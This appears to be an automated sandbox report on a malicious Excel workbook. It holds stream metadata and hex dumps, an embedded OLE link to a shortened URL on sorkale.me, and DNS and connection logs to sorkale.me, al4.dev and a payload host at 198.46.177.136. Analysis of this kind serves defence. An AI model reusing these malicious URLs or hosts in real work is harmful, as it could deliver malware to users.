            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z @ , . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5a fe 40 2c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.889430592781307
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:200
            Entropy:3.236575879994164
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
            General
            Stream Path:MBD001CFA10/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD001CFA10/\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:484
            Entropy:3.922883556049869
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
            General
            Stream Path:MBD001CFA10/\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:220
            Entropy:3.454658336338623
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . q . { . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 6c 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
            General
            Stream Path:MBD001CFA10/MBD001E046E/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD001CFA10/MBD001E046E/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:340453
            Entropy:7.9932133690187115
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . . 2 N . . . H . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c3 98 32 4e 9e 01 00 00 48 06 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD001CFA10/MBD001E1119/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.219515110876372
            Base64 Encoded:False
            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD001CFA10/MBD001E1119/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:402711
            Entropy:7.898868757222738
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . 8 5 ~ . J . . . H . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 38 35 7e 01 4a 02 00 00 48 0f 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:MBD001CFA10/Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:355277
            Entropy:7.332537150221057
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            General
            Stream Path:MBD001CFA11/\x1Ole
            CLSID:
            File Type:data
            Stream Size:560
            Entropy:5.777686346683852
            Base64 Encoded:False
            Data ASCII:. . . . > N . ( . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . o . r . k . a . l . e . . . m . e . / . G . s . W . z . 6 . D . . . j . } p s > $ q H . c J N t 8 u R | O . ! } ' 2 : . I . . . , . . J . M U G < + . u { k @ A . a W . . s . u } . # p . . _ * . R n . . ^ ~ / - u N E G ! ] g b 6 . ! @ . E . C . , d . z . 2 ` 9 { a . d ` a P ' k A . . . . . . . . . . . . . . . . . . . Q . I . y . 6 . d . u . 2 . p . Z . g . E . O . J . c . D . K . R . L . p . r . N . i . 8
            Data Raw:01 00 00 02 e1 3e b5 4e 94 c2 8e 28 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 6f 00 72 00 6b 00 61 00 6c 00 65 00 2e 00 6d 00 65 00 2f 00 47 00 73 00 57 00 7a 00 36 00 44 00 00 00 6a 9d b9 1b ed 7d 70 73 e4 3e b2 ac 24 71 91 48 11 63 4a a8 ca 4e 74 38 75 a6 52 bb
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:85188
            Entropy:7.989573841189429
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . L W Z . . & " O . O . w . z 4 . e T K J . 1 . % 5 T . e . . . . . . . . . . * . . . \\ . p . d 4 k R . g f . Q . * . . G . _ P . B . Z l . . @ . . . / . " e . / E . . C ? . _ e ~ . 9 . . . ? J ) Z q g . . B . F B . . . B a . . . d E . . . = . . . M H , . . . c h > . u . . b . . . . . . . . . . . . k . . . . . . . . . . . . . L = . . . . H h H . Q . C . ^ Y @ . . . . . . q " . . . ! . . . . m . . . . . . 4 Q 1 . . . , . % . . . ( D = w . . [ 1 . . . ;
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a3 4c cd eb 57 5a 0d d5 d1 b6 26 ca 22 4f 11 b0 ac bf ae 4f db 98 77 0a 7a 9f d6 eb 34 14 99 f8 65 e4 54 4b 4a 08 9e b2 31 1c 25 35 98 54 19 65 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 ae 2a e2 00 00 00 5c 00 70 00 64 8c c2 34 b5 97 6b 85 52 18 82 67 fb ac bc 81 ab 66 2e 51 06 86 a3 20 bd af
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:525
            Entropy:5.250219136159956
            Base64 Encoded:True
            Data ASCII:I D = " { 2 4 7 9 D E 9 D - D F 2 2 - 4 6 7 6 - A D 8 0 - 4 3 E E 7 B 7 4 7 2 C D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 6 A 4 5 9 8 6 5 B 8 E 8 4 9 2 8
            Data Raw:49 44 3d 22 7b 32 34 37 39 44 45 39 44 2d 44 46 32 32 2d 34 36 37 36 2d 41 44 38 30 2d 34 33 45 45 37 42 37 34 37 32 43 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:104
            Entropy:3.0488640812019017
            Base64 Encoded:False
            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:2644
            Entropy:4.001238960556785
            Base64 Encoded:False
            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:data
            Stream Size:553
            Entropy:6.365293362205571
            Base64 Encoded:True
            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 2 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 88 32 c9 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
            TimestampSource PortDest PortSource IPDest IP
            Feb 19, 2025 15:32:19.183902979 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.183944941 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:19.184052944 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.184310913 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.184331894 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:19.653366089 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:19.653497934 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.682898998 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.682924986 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:19.683983088 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:19.685929060 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.694005013 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:19.739337921 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:20.540261030 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:20.540410042 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:20.540443897 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:20.540468931 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:20.544070959 CET49759443192.168.2.4104.21.87.137
            Feb 19, 2025 15:32:20.544090986 CET44349759104.21.87.137192.168.2.4
            Feb 19, 2025 15:32:20.593064070 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:20.593133926 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:20.593215942 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:20.593535900 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:20.593559027 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.071325064 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.071424961 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.075017929 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.075032949 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.075402975 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.075467110 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.075758934 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.123341084 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.468565941 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.468713045 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.468739986 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.468769073 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.471951962 CET49770443192.168.2.4188.114.97.3
            Feb 19, 2025 15:32:21.471976042 CET44349770188.114.97.3192.168.2.4
            Feb 19, 2025 15:32:21.473170042 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.478210926 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.478282928 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.478401899 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.483369112 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980067015 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980123997 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980139017 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980161905 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980178118 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980190992 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.980192900 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980210066 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980226994 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980230093 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.980243921 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980259895 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.980273008 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.980283976 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.980310917 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.985389948 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.985418081 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.985470057 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.985491037 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:21.985527039 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:21.985568047 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:22.068728924 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:22.068747997 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:22.068813086 CET8049776198.46.177.136192.168.2.4
            Feb 19, 2025 15:32:22.068823099 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:22.068856001 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:22.068856001 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:22.169404984 CET4977680192.168.2.4198.46.177.136
            Feb 19, 2025 15:32:22.169449091 CET4977680192.168.2.4198.46.177.136
            TimestampSource PortDest PortSource IPDest IP
            Feb 19, 2025 15:32:18.993311882 CET5639253192.168.2.41.1.1.1
            Feb 19, 2025 15:32:19.182751894 CET53563921.1.1.1192.168.2.4
            Feb 19, 2025 15:32:20.546472073 CET5990453192.168.2.41.1.1.1
            Feb 19, 2025 15:32:20.592233896 CET53599041.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Feb 19, 2025 15:32:18.993311882 CET192.168.2.41.1.1.10x3e64Standard query (0)sorkale.meA (IP address)IN (0x0001)false
            Feb 19, 2025 15:32:20.546472073 CET192.168.2.41.1.1.10x43a6Standard query (0)al4.devA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Feb 19, 2025 15:31:29.971930981 CET1.1.1.1192.168.2.40x1b2eNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
            Feb 19, 2025 15:31:29.971930981 CET1.1.1.1192.168.2.40x1b2eNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
            Feb 19, 2025 15:31:29.971930981 CET1.1.1.1192.168.2.40x1b2eNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
            Feb 19, 2025 15:31:30.690707922 CET1.1.1.1192.168.2.40x46ccNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
            Feb 19, 2025 15:31:30.690707922 CET1.1.1.1192.168.2.40x46ccNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
            Feb 19, 2025 15:32:17.240793943 CET1.1.1.1192.168.2.40xb75aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
            Feb 19, 2025 15:32:17.240793943 CET1.1.1.1192.168.2.40xb75aNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
            Feb 19, 2025 15:32:17.240793943 CET1.1.1.1192.168.2.40xb75aNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
            Feb 19, 2025 15:32:17.240793943 CET1.1.1.1192.168.2.40xb75aNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
            Feb 19, 2025 15:32:19.182751894 CET1.1.1.1192.168.2.40x3e64No error (0)sorkale.me104.21.87.137A (IP address)IN (0x0001)false
